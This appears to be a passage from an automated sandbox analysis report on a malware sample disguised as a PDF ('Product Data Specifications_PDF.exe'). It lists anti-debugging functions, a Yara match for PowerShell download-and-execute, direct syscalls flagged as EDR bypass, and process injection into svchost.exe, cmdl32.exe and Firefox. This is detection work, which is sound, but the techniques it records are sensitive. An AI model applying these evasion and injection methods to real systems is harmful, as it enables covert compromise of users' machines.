            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03650BCB mov eax, dword ptr fs:[00000030h]9_2_03650BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03650BCB mov eax, dword ptr fs:[00000030h]9_2_03650BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03630BCD mov eax, dword ptr fs:[00000030h]9_2_03630BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03630BCD mov eax, dword ptr fs:[00000030h]9_2_03630BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03630BCD mov eax, dword ptr fs:[00000030h]9_2_03630BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036DEBD0 mov eax, dword ptr fs:[00000030h]9_2_036DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640BBE mov eax, dword ptr fs:[00000030h]9_2_03640BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640BBE mov eax, dword ptr fs:[00000030h]9_2_03640BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E4BB0 mov eax, dword ptr fs:[00000030h]9_2_036E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E4BB0 mov eax, dword ptr fs:[00000030h]9_2_036E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366CA6F mov eax, dword ptr fs:[00000030h]9_2_0366CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366CA6F mov eax, dword ptr fs:[00000030h]9_2_0366CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366CA6F mov eax, dword ptr fs:[00000030h]9_2_0366CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036DEA60 mov eax, dword ptr fs:[00000030h]9_2_036DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036ACA72 mov eax, dword ptr fs:[00000030h]9_2_036ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036ACA72 mov eax, dword ptr fs:[00000030h]9_2_036ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03636A50 mov eax, dword ptr fs:[00000030h]9_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03636A50 mov eax, dword ptr fs:[00000030h]9_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03636A50 mov eax, dword ptr fs:[00000030h]9_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03636A50 mov eax, dword ptr fs:[00000030h]9_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03636A50 mov eax, dword ptr fs:[00000030h]9_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03636A50 mov eax, dword ptr fs:[00000030h]9_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03636A50 mov eax, dword ptr fs:[00000030h]9_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640A5B mov eax, dword ptr fs:[00000030h]9_2_03640A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640A5B mov eax, dword ptr fs:[00000030h]9_2_03640A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366CA24 mov eax, dword ptr fs:[00000030h]9_2_0366CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365EA2E mov eax, dword ptr fs:[00000030h]9_2_0365EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03654A35 mov eax, dword ptr fs:[00000030h]9_2_03654A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03654A35 mov eax, dword ptr fs:[00000030h]9_2_03654A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366CA38 mov eax, dword ptr fs:[00000030h]9_2_0366CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036BCA11 mov eax, dword ptr fs:[00000030h]9_2_036BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366AAEE mov eax, dword ptr fs:[00000030h]9_2_0366AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366AAEE mov eax, dword ptr fs:[00000030h]9_2_0366AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03686ACC mov eax, dword ptr fs:[00000030h]9_2_03686ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03686ACC mov eax, dword ptr fs:[00000030h]9_2_03686ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03686ACC mov eax, dword ptr fs:[00000030h]9_2_03686ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03630AD0 mov eax, dword ptr fs:[00000030h]9_2_03630AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03664AD0 mov eax, dword ptr fs:[00000030h]9_2_03664AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03664AD0 mov eax, dword ptr fs:[00000030h]9_2_03664AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03638AA0 mov eax, dword ptr fs:[00000030h]9_2_03638AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03638AA0 mov eax, dword ptr fs:[00000030h]9_2_03638AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03686AA4 mov eax, dword ptr fs:[00000030h]9_2_03686AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363EA80 mov eax, dword ptr fs:[00000030h]9_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363EA80 mov eax, dword ptr fs:[00000030h]9_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363EA80 mov eax, dword ptr fs:[00000030h]9_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363EA80 mov eax, dword ptr fs:[00000030h]9_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363EA80 mov eax, dword ptr fs:[00000030h]9_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363EA80 mov eax, dword ptr fs:[00000030h]9_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363EA80 mov eax, dword ptr fs:[00000030h]9_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363EA80 mov eax, dword ptr fs:[00000030h]9_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363EA80 mov eax, dword ptr fs:[00000030h]9_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03704A80 mov eax, dword ptr fs:[00000030h]9_2_03704A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03668A90 mov edx, dword ptr fs:[00000030h]9_2_03668A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03656962 mov eax, dword ptr fs:[00000030h]9_2_03656962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03656962 mov eax, dword ptr fs:[00000030h]9_2_03656962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03656962 mov eax, dword ptr fs:[00000030h]9_2_03656962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0367096E mov eax, dword ptr fs:[00000030h]9_2_0367096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0367096E mov edx, dword ptr fs:[00000030h]9_2_0367096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0367096E mov eax, dword ptr fs:[00000030h]9_2_0367096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036D4978 mov eax, dword ptr fs:[00000030h]9_2_036D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036D4978 mov eax, dword ptr fs:[00000030h]9_2_036D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036BC97C mov eax, dword ptr fs:[00000030h]9_2_036BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B0946 mov eax, dword ptr fs:[00000030h]9_2_036B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03704940 mov eax, dword ptr fs:[00000030h]9_2_03704940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B892A mov eax, dword ptr fs:[00000030h]9_2_036B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C892B mov eax, dword ptr fs:[00000030h]9_2_036C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AE908 mov eax, dword ptr fs:[00000030h]9_2_036AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AE908 mov eax, dword ptr fs:[00000030h]9_2_036AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036BC912 mov eax, dword ptr fs:[00000030h]9_2_036BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03628918 mov eax, dword ptr fs:[00000030h]9_2_03628918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03628918 mov eax, dword ptr fs:[00000030h]9_2_03628918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036BE9E0 mov eax, dword ptr fs:[00000030h]9_2_036BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036629F9 mov eax, dword ptr fs:[00000030h]9_2_036629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036629F9 mov eax, dword ptr fs:[00000030h]9_2_036629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C69C0 mov eax, dword ptr fs:[00000030h]9_2_036C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363A9D0 mov eax, dword ptr fs:[00000030h]9_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363A9D0 mov eax, dword ptr fs:[00000030h]9_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363A9D0 mov eax, dword ptr fs:[00000030h]9_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363A9D0 mov eax, dword ptr fs:[00000030h]9_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363A9D0 mov eax, dword ptr fs:[00000030h]9_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363A9D0 mov eax, dword ptr fs:[00000030h]9_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036649D0 mov eax, dword ptr fs:[00000030h]9_2_036649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036FA9D3 mov eax, dword ptr fs:[00000030h]9_2_036FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036429A0 mov eax, dword ptr fs:[00000030h]9_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036429A0 mov eax, dword ptr fs:[00000030h]9_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036429A0 mov eax, dword ptr fs:[00000030h]9_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036429A0 mov eax, dword ptr fs:[00000030h]9_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036429A0 mov eax, dword ptr fs:[00000030h]9_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036429A0 mov eax, dword ptr fs:[00000030h]9_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036429A0 mov eax, dword ptr fs:[00000030h]9_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036429A0 mov eax, dword ptr fs:[00000030h]9_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036429A0 mov eax, dword ptr fs:[00000030h]9_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036429A0 mov eax, dword ptr fs:[00000030h]9_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036429A0 mov eax, dword ptr fs:[00000030h]9_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036429A0 mov eax, dword ptr fs:[00000030h]9_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036429A0 mov eax, dword ptr fs:[00000030h]9_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036309AD mov eax, dword ptr fs:[00000030h]9_2_036309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036309AD mov eax, dword ptr fs:[00000030h]9_2_036309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B89B3 mov esi, dword ptr fs:[00000030h]9_2_036B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B89B3 mov eax, dword ptr fs:[00000030h]9_2_036B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B89B3 mov eax, dword ptr fs:[00000030h]9_2_036B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036BE872 mov eax, dword ptr fs:[00000030h]9_2_036BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036BE872 mov eax, dword ptr fs:[00000030h]9_2_036BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C6870 mov eax, dword ptr fs:[00000030h]9_2_036C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C6870 mov eax, dword ptr fs:[00000030h]9_2_036C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03642840 mov ecx, dword ptr fs:[00000030h]9_2_03642840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03660854 mov eax, dword ptr fs:[00000030h]9_2_03660854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03634859 mov eax, dword ptr fs:[00000030h]9_2_03634859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03634859 mov eax, dword ptr fs:[00000030h]9_2_03634859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03652835 mov eax, dword ptr fs:[00000030h]9_2_03652835
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,6_2_004238DA
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_0041F250 SetUnhandledExceptionFilter,6_2_0041F250
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0041A208
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00417DAA

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Yara detected Powershell download and execute
            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7336, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: EyHLOQmzGKBL.exe PID: 2340, type: MEMORYSTR
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeNtMapViewOfSection: Direct from: 0x77762D1CJump to behavior
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeNtNotifyChangeKey: Direct from: 0x77763C2CJump to behavior
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeNtCreateMutant: Direct from: 0x777635CCJump to behavior
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeNtResumeThread: Direct from: 0x777636ACJump to behavior
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeNtProtectVirtualMemory: Direct from: 0x77757B2EJump to behavior
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeNtQuerySystemInformation: Direct from: 0x77762DFCJump to behavior
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeNtAllocateVirtualMemory: Direct from: 0x77762BFCJump to behavior
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeNtDelayExecution: Direct from: 0x77762DDCJump to behavior
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeNtQueryInformationProcess: Direct from: 0x77762C26Jump to behavior
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeNtSetInformationThread: Direct from: 0x777563F9Jump to behavior
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeNtOpenKeyEx: Direct from: 0x77763C9CJump to behavior
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeNtSetInformationThread: Direct from: 0x77762B4CJump to behavior
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeNtQueryAttributesFile: Direct from: 0x77762E6CJump to behavior
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeNtClose: Direct from: 0x77762B6C
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeNtReadVirtualMemory: Direct from: 0x77762E8CJump to behavior
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeNtCreateKey: Direct from: 0x77762C6CJump to behavior
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeNtQuerySystemInformation: Direct from: 0x777648CCJump to behavior
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeNtAllocateVirtualMemory: Direct from: 0x777648ECJump to behavior
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeNtOpenSection: Direct from: 0x77762E0CJump to behavior
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeNtDeviceIoControlFile: Direct from: 0x77762AECJump to behavior
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeNtQueryValueKey: Direct from: 0x77762BECJump to behavior
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeNtQueryInformationToken: Direct from: 0x77762CACJump to behavior
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeNtTerminateThread: Direct from: 0x77762FCCJump to behavior
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeNtCreateFile: Direct from: 0x77762FECJump to behavior
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeNtOpenFile: Direct from: 0x77762DCCJump to behavior
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeNtOpenKeyEx: Direct from: 0x77762B9CJump to behavior
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeNtSetInformationProcess: Direct from: 0x77762C5CJump to behavior
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeNtProtectVirtualMemory: Direct from: 0x77762F9CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmdl32.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: NULL target: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: NULL target: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\cmdl32.exeThread register set: target process: 7836Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\cmdl32.exeThread APC queued: target process: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: BFF008Jump to behavior
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_00436CD7 LogonUserW,6_2_00436CD7
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,6_2_0040D590
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,6_2_00434418
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,6_2_0043333C
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Product Data Specifications_PDF.exe"Jump to behavior
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeProcess created: C:\Windows\SysWOW64\cmdl32.exe "C:\Windows\SysWOW64\cmdl32.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,6_2_00446124
            Source: Product Data Specifications_PDF.exe, EyHLOQmzGKBL.exe, 0000000B.00000000.1684358268.0000000001A50000.00000002.00000001.00040000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000B.00000002.3157562461.0000000001A51000.00000002.00000001.00040000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3158649189.0000000000DE1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: EyHLOQmzGKBL.exe, 0000000B.00000000.1684358268.0000000001A50000.00000002.00000001.00040000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000B.00000002.3157562461.0000000001A51000.00000002.00000001.00040000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3158649189.0000000000DE1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
